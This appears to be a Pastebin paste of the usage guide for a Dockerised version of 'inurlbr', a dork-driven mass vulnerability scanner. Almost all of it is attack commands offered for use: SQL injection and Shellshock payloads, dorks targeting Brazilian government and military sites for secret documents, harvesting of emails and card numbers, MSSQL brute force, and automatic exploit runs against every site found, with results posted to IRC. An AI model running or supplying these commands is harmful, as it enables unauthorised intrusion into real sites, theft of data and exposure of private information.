Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- A pesquisa avançada nos mecanismos de pesquisa permite a análise fornecida para explorar e-mails e URLs de captura GET / POST, com uma junção de validação personalizada interna para cada destino / URL encontrado.
- Como construir
- git clone https://github.com/gmdutra/docker-inurlbr.git
- cd docker-inurlbr
- docker build -t gmdutra/inurlbr .
- Corre
- docker run --name inurlbr -it -d gmdutra/inurlbr
- -h
- --help Alternative long length help command.
- --ajuda Command to specify Help.
- --info Information script.
- --update Code update.
- -q Choose which search engine you want through [1...24] / [e1..6]]:
- [options]:
- 1 - GOOGLE / (CSE) GENERIC RANDOM / API
- 2 - BING
- 3 - YAHOO BR
- 4 - ASK
- 5 - HAO123 BR
- 6 - GOOGLE (API)
- 7 - LYCOS
- 8 - UOL BR
- 9 - YAHOO US
- 10 - SAPO
- 11 - DMOZ
- 12 - GIGABLAST
- 13 - NEVER
- 14 - BAIDU BR
- 15 - YANDEX
- 16 - ZOO
- 17 - HOTBOT
- 18 - ZHONGSOU
- 19 - HKSEARCH
- 20 - EZILION
- 21 - SOGOU
- 22 - DUCK DUCK GO
- 23 - BOOROW
- 24 - GOOGLE(CSE) GENERIC RANDOM
- ----------------------------------------
- SPECIAL MOTORS
- ----------------------------------------
- e1 - TOR FIND
- e2 - ELEPHANT
- e3 - TORSEARCH
- e4 - WIKILEAKS
- e5 - OTN
- e6 - EXPLOITS SHODAN
- ----------------------------------------
- all - All search engines / not special motors
- Default: 1
- Example: -q {op}
- Usage: -q 1
- -q 5
- Using more than one engine: -q 1,2,5,6,11,24
- Using all engines: -q all
- --proxy Choose which proxy you want to use through the search engine:
- Example: --proxy {proxy:port}
- Usage: --proxy localhost:8118
- --proxy socks5://[email protected]:9050
- --proxy http://admin:[email protected]:8080
- --proxy-file Set font file to randomize your proxy to each search engine.
- Example: --proxy-file {proxys}
- Usage: --proxy-file proxys_list.txt
- --time-proxy Set the time how often the proxy will be exchanged.
- Example: --time-proxy {second}
- Usage: --time-proxy 10
- --proxy-http-file Set file with urls http proxy,
- are used to bular capch search engines
- Example: --proxy-http-file {youfilehttp}
- Usage: --proxy-http-file http_proxys.txt
- --tor-random Enables the TOR function, each usage links an unique IP.
- -t Choose the validation type: op 1, 2, 3, 4, 5
- [options]:
- 1 - The first type uses default errors considering the script:
- It establishes connection with the exploit through the get method.
- Demo: www.alvo.com.br/pasta/index.php?id={exploit}
- 2 - The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'
- It also establishes connection with the exploit through the get method
- Demo: www.alvo.com.br/pasta/index.php?id={exploit}
- 3 - The third type combine both first and second types:
- Then, of course, it also establishes connection with the exploit through the get method
- Demo: www.target.com.br{exploit}
- Default: 1
- Example: -t {op}
- Usage: -t 1
- 4 - The fourth type a validation based on source file and will be enabled scanner standard functions.
- The source file their values are concatenated with target url.
- - Set your target with command --target {http://target}
- - Set your file with command -o {file}
- Explicative:
- Source file values:
- /admin/index.php?id=
- /pag/index.php?id=
- /brazil.php?new=
- Demo:
- www.target.com.br/admin/index.php?id={exploit}
- www.target.com.br/pag/index.php?id={exploit}
- www.target.com.br/brazil.php?new={exploit}
- 5 - (FIND PAGE) The fifth type of validation based on the source file,
- Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
- - Set your target with command --target {http://target}
- - Set your file with command -o {file}
- Explicative:
- Source file values:
- /admin/admin.php
- /admin.asp
- /admin.aspx
- Demo:
- www.target.com.br/admin/admin.php
- www.target.com.br/admin.asp
- www.target.com.br/admin.aspx
- Observation: If it shows the code 200 will be separated in the output file
- DEFAULT ERRORS:
- [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK,
- [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,
- [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
- [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,
- [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA,
- [*]ERROR INDEFINITE
- --dork Defines which dork the search engine will use.
- Example: --dork {dork}
- Usage: --dork 'site:.gov.br inurl:php? id'
- - Using multiples dorks:
- Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
- Usage: --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
- --dork-file Set font file with your search dorks.
- Example: --dork-file {dork_file}
- Usage: --dork-file 'dorks.txt'
- --exploit-get Defines which exploit will be injected through the GET method to each URL found.
- Example: --exploit-get {exploit_get}
- Usage: --exploit-get "?'´%270x27;"
- --exploit-post Defines which exploit will be injected through the POST method to each URL found.
- Example: --exploit-post {exploit_post}
- Usage: --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'
- --exploit-command Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all.
- The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_
- Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'
- _TARGET_ is the specified URL/TARGET obtained by the process
- _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.
- Example: --exploit-command {exploit-command}
- Usage: --exploit-command '/admin/config.conf'
- -a Specify the string that will be used on the search script:
- Example: -a {string}
- Usage: -a '<title>hello world</title>'
- -d Specify the script usage op 1, 2, 3, 4, 5.
- Example: -d {op}
- Usage: -d 1 /URL of the search engine.
- -d 2 /Show all the url.
- -d 3 /Detailed request of every URL.
- -d 4 /Shows the HTML of every URL.
- -d 5 /Detailed request of all URLs.
- -d 6 /Detailed PING - PONG irc.
- -s Specify the output file where it will be saved the vulnerable URLs.
- Example: -s {file}
- Usage: -s your_file.txt
- -o Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
- Example: -o {file_where_my_urls_are}
- Usage: -o tests.txt
- --persist Attempts when Google blocks your search.
- The script tries to another google host / default = 4
- Example: --persist {number_attempts}
- Usage: --persist 7
- --ifredirect Return validation method post REDIRECT_URL
- Example: --ifredirect {string_validation}
- Usage: --ifredirect '/admin/painel.php'
- -m Enable the search for emails on the urls specified.
- -u Enables the search for URL lists on the url specified.
- --gc Enable validation of values with google webcache.
- --pr Progressive scan, used to set operators (dorks),
- makes the search of a dork and valid results, then goes a dork at a time.
- --file-cookie Open cookie file.
- --save-as Save results in a certain place.
- --shellshock Explore shellshock vulnerability by setting a malicious user-agent.
- --popup Run --command all or vuln in a parallel terminal.
- --cms-check Enable simple check if the url / target is using CMS.
- --no-banner Remove the script presentation banner.
- --unique Filter results in unique domains.
- --beep Beep sound when a vulnerability is found.
- --alexa-rank Show alexa positioning in the results.
- --robots Show values file robots.
- --range Set range IP.
- Example: --range {range_start,rage_end}
- Usage: --range '172.16.0.5#172.16.0.255'
- --range-rand Set amount of random ips.
- Example: --range-rand {rand}
- Usage: --range-rand '50'
- --irc Sending vulnerable to IRC / server channel.
- Example: --irc {server#channel}
- Usage: --irc 'irc.rizon.net#inurlbrasil'
- --http-header Set HTTP header.
- Example: --http-header {youemail}
- Usage: --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'
- --sedmail Sending vulnerable to email.
- Example: --sedmail {youemail}
- Usage: --sedmail [email protected]
- --delay Delay between research processes.
- Example: --delay {second}
- Usage: --delay 10
- --time-out Timeout to exit the process.
- Example: --time-out {second}
- Usage: --time-out 10
- --ifurl Filter URLs based on their argument.
- Example: --ifurl {ifurl}
- Usage: --ifurl index.php?id=
- --ifcode Valid results based on your return http code.
- Example: --ifcode {ifcode}
- Usage: --ifcode 200
- --ifemail Filter E-mails based on their argument.
- Example: --ifemail {file_where_my_emails_are}
- Usage: --ifemail sp.gov.br
- --url-reference Define referring URL in the request to send him against the target.
- Example: --url-reference {url}
- Usage: --url-reference http://target.com/admin/user/valid.php
- --mp Limits the number of pages in the search engines.
- Example: --mp {limit}
- Usage: --mp 50
- --user-agent Define the user agent used in its request against the target.
- Example: --user-agent {agent}
- Usage: --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
- Usage-exploit / SHELLSHOCK:
- --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
- Complete command:
- php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'
- --sall Saves all urls found by the scanner.
- Example: --sall {file}
- Usage: --sall your_file.txt
- --command-vul Every vulnerable URL found will execute this command parameters.
- Example: --command-vul {command}
- Usage: --command-vul 'nmap sV -p 22,80,21 _TARGET_'
- --command-vul './exploit.sh _TARGET_ output.txt'
- --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'
- --command-all Use this commmand to specify a single command to EVERY URL found.
- Example: --command-all {command}
- Usage: --command-all 'nmap sV -p 22,80,21 _TARGET_'
- --command-all './exploit.sh _TARGET_ output.txt'
- --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
- [!] Observation:
- _TARGET_ will be replaced by the URL/target found, although if the user
- doesn't input the get, only the domain will be executed.
- _TARGETFULL_ will be replaced by the original URL / target found.
- _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.
- _TARGETIP_ return of ip URL / target found.
- _URI_ Back URL set of folders / target found.
- _RANDOM_ Random strings.
- _PORT_ Capture port of the current test, within the --port-scan process.
- _EXPLOIT_ will be replaced by the specified command argument --exploit-command.
- The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_
- --replace Replace values in the target URL.
- Example: --replace {value_old[INURL]value_new}
- Usage: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
- --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
- --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'
- --remove Remove values in the target URL.
- Example: --remove {string}
- Usage: --remove '/admin.php?id=0'
- --regexp Using regular expression to validate his research, the value of the
- Expression will be sought within the target/URL.
- Example: --regexp {regular_expression}
- All Major Credit Cards:
- Usage: --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'
- IP Addresses:
- Usage: --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'
- EMAIL:
- Usage: --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
- ---regexp-filter Using regular expression to filter his research, the value of the
- Expression will be sought within the target/URL.
- Example: ---regexp-filter {regular_expression}
- EMAIL:
- Usage: ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
- [!] Small commands manager:
- --exploit-cad Command register for use within the scanner.
- Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
- Example Format: NMAP::nmap -sV _TARGET_
- Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
- Usage: --exploit-cad 'NMAP::nmap -sV _TARGET_'
- Observation: Each registered command is identified by an id of your array.
- Commands are logged in exploits.conf file.
- --exploit-all-id Execute commands, exploits based on id of use,
- (all) is run for each target found by the engine.
- Example: --exploit-all-id {id,id}
- Usage: --exploit-all-id 1,2,8,22
- --exploit-vul-id Execute commands, exploits based on id of use,
- (vull) run command only if the target was considered vulnerable.
- Example: --exploit-vul-id {id,id}
- Usage: --exploit-vul-id 1,2,8,22
- --exploit-list List all entries command in exploits.conf file.
- [!] Running subprocesses:
- --sub-file Subprocess performs an injection
- strings in URLs found by the engine, via GET or POST.
- Example: --sub-file {youfile}
- Usage: --sub-file exploits_get.txt
- --sub-get defines whether the strings coming from
- --sub-file will be injected via GET.
- Usage: --sub-get
- --sub-post defines whether the strings coming from
- --sub-file will be injected via POST.
- Usage: --sub-get
- --sub-cmd-vul Each vulnerable URL found within the sub-process
- will execute the parameters of this command.
- Example: --sub-cmd-vul {command}
- Usage: --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'
- --sub-cmd-vul './exploit.sh _TARGET_ output.txt'
- --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'
- --sub-cmd-all Run command to each target found within the sub-process scope.
- Example: --sub-cmd-all {command}
- Usage: --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'
- --sub-cmd-all './exploit.sh _TARGET_ output.txt'
- --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'
- --port-scan Defines ports that will be validated as open.
- Example: --port-scan {ports}
- Usage: --port-scan '22,21,23,3306'
- --port-cmd Define command that runs when finding an open door.
- Example: --port-cmd {command}
- Usage: --port-cmd './xpl _TARGETIP_:_PORT_'
- --port-cmd './xpl _TARGETIP_/file.php?sqli=1'
- --port-write Send values for door.
- Example: --port-write {'value0','value1','value3'}
- Usage: --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"
- [!] Modifying values used within script parameters:
- md5 Encrypt values in md5.
- Example: md5({value})
- Usage: md5(102030)
- Usage: --exploit-get 'user?id=md5(102030)'
- base64 Encrypt values in base64.
- Example: base64({value})
- Usage: base64(102030)
- Usage: --exploit-get 'user?id=base64(102030)'
- hex Encrypt values in hex.
- Example: hex({value})
- Usage: hex(102030)
- Usage: --exploit-get 'user?id=hex(102030)'
- Generate random values.
- Example: random({character_counter})
- Usage: random(8)
- Usage: --exploit-get 'user?id=random(8)'
- Comandos Simples
- docker exec inurlbr ./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
- docker exec inurlbr ./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
- docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
- docker exec inurlbr ./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'
- docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'
- docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'
- docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"
- docker exec inurlbr ./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'
- docker exec inurlbr ./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 _TARGET_'
- docker exec inurlbr ./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'
- docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'
- docker exec inurlbr ./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'
- docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
- docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m
- docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u
- docker exec inurlbr ./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6
- docker exec inurlbr ./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'
- docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6
- docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'
- docker exec inurlbr ./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'
- docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4
- docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"
- docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'
- docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5
- docker exec inurlbr ./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'
- docker exec inurlbr ./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'
- docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8
- docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 --pr
- docker exec inurlbr ./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --pr --shellshock
- docker exec inurlbr ./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --sub-file 'xpls_Arbitrary_File_Download.txt'
- Desenvolvedores
- ----------------------------------------------
- Original Version
- ----------------------------------------------
- [+] AUTOR: googleINURL
- [+] EMAIL: [email protected]
- [+] Blog: http://blog.inurl.com.br
- ----------------------------------------------
- Docker Version
- ----------------------------------------------
- [+] AUTOR: Gabriel Dutra (c0olr00t)
- [+] EMAIL: [email protected]
- [+] LINKEDIN: linkedin.com/in/gmdutra/
- ----------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement